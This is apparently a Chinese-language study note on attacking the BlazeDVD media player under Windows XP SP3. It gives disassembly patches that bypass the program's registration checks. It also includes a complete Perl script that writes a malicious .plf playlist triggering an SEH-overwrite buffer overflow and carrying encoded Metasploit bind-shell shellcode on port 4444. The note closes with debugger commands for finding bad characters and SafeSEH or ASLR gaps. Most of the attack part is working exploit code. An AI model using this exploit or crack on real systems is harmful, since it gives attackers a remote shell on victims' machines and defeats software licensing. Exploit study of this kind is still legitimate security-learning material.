随便下载的 BlazeDVD 版本 来实验················
XP SP3 无DEP
首先程序破解:
很简单 直接搜搜字符串 修改几个jmp 即可成功
6030324B . /E9 35030000 jmp Configur.60303585 60303250 > |68 C0003460 push Configur.603400C0 ; IsRegistered1 60303255 . |57 push edi 60303256 . |E8 15570100 call Configur.60318970 6030325B . |83C4 08 add esp,0x8 6030325E . |85C0 test eax,eax 60303260 |E9 93000000 jmp Configur.603032F8 //jmp
603033A1 > \68 A87A3460 push Configur.60347AA8 ; IsRegistered3 603033A6 . 57 push edi 603033A7 . E8 C4550100 call Configur.60318970 603033AC . 83C4 08 add esp,0x8 603033AF . 85C0 test eax,eax 603033B1 E9 94000000 jmp Configur.6030344A //jmp 603033B6 90 nop
6030344A > \68 947A3460 push Configur.60347A94 ; IsPlaybackTimeOut 6030344F . 57 push edi 60303450 . E8 1B550100 call Configur.60318970 60303455 . 83C4 08 add esp,0x8 60303458 . 85C0 test eax,eax 6030345A EB 1B jmp XConfigur.60303477
60303477 > \57 push edi 60303478 . 8D4E E8 lea ecx,dword ptr ds:[esi-0x18] 6030347B . E8 E0280000 call Configur.60305D60 60303480 . 8BD8 mov ebx,eax 60303482 . 83FB FF cmp ebx,-0x1 60303485 EB 07 jmp XConfigur.6030348E 60303487 . 33C0 xor eax,eax 60303489 . E9 F7000000 jmp Configur.60303585 6030348E > 68 E0773460 push Configur.603477E0 ; AutoResumeMode 60303493 . 57 push edi
PERL脚本:
my $file = "test.plf"; #0x1000ecfa pop ebx; pop ebp; ret #0x1000ef4a pop esi; pop ebp; ret #0x1000f00e pop edi; pop esi; ret #0x100101e7 pop esi; pop ecx; ret #0x1001028f pop esi; pop ebx; retn 0x0010 #0x100104d7 pop ebx; pop ecx; retn 0x000c #0x10010511 pop esi; pop ebx; retn 0x000c #0x1001058a pop ebp; pop ebx; retn 0x0010 #0x10010595 pop ebp; pop ebx; retn 0x0010 #0x1001059f pop ebp; pop ebx; retn 0x0010 #0x100105f1 pop esi; pop ebx; retn 0x000c my $junk = "\xcc"x608; my $nseh = "\xeb\x1e\x90\x90"; my $seh = pack('V',0x10010511); my $prejunk = "\x90"x30; # windows/shell_bind_tcp - 368 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh, #\x1a my $shellcode = "\xD9\xEE". "\xD9\x74\x24\xF4". "\x58". "\x83\xC0\x1b". "\x33\xC9". "\x8A\x1C\x08" . "\x80\xF3\x11". "\x88\x1C\x08". "\x41" . "\x80\xFB\x90". "\x75\xF1". "\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d". "\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42". "\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a". "\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84". "\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48". "\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b". "\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64". "\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12". "\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca". "\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41". "\x42\xee\x46\xed\x42\xee\x46\xe9\x81"; my $payload = $junk.$nseh.$seh.$prejunk.$shellcode; open($FILE,">$file"); print $FILE $payload; close($FILE);
下面学习检查可能存在的 bad characters
!load byakugan
!jutsu memDiff file 302 c:\sploits\shell.txt 0x0012f5de
shellcode长度 + 包含shellcode的文件+ 内存中 的起始地址
粗字体为 不同的地方
我将上面的shellcode "\xee" 全改为了 "\xcc" 检查如下:
!load byakugan
!jutsu identBuf file myShell c:\shell.txt
!jutsu identBuf msfpattern myBuffer 608
!jutsu listBuf
!searchcode jmp esp 可以显示 模块属性 DEP寻找特殊代码时要用!!!!!!!!!!!!!!!
!aslrdynamicbase 查看随机分布的模块
!pvefindaddr j jmp/call ret 组合
jseh 用于绕过 SAFESEH 保护时特别有用
nosafeseh 未经saffeseh保护的模块
!packets 用于捕获无线数据包 打开网页 附加 !packet 继续运行 查看 captured Packets 窗口
!safeseh 列出可执行模块,并提示是否受 safeseh保护 !safeseh 命令
!mona bytearray ······················· 可以生成 00-ff 去检测bad character
找寻 shellcode 位置 !mona cmp -f c:\1\egg1.bin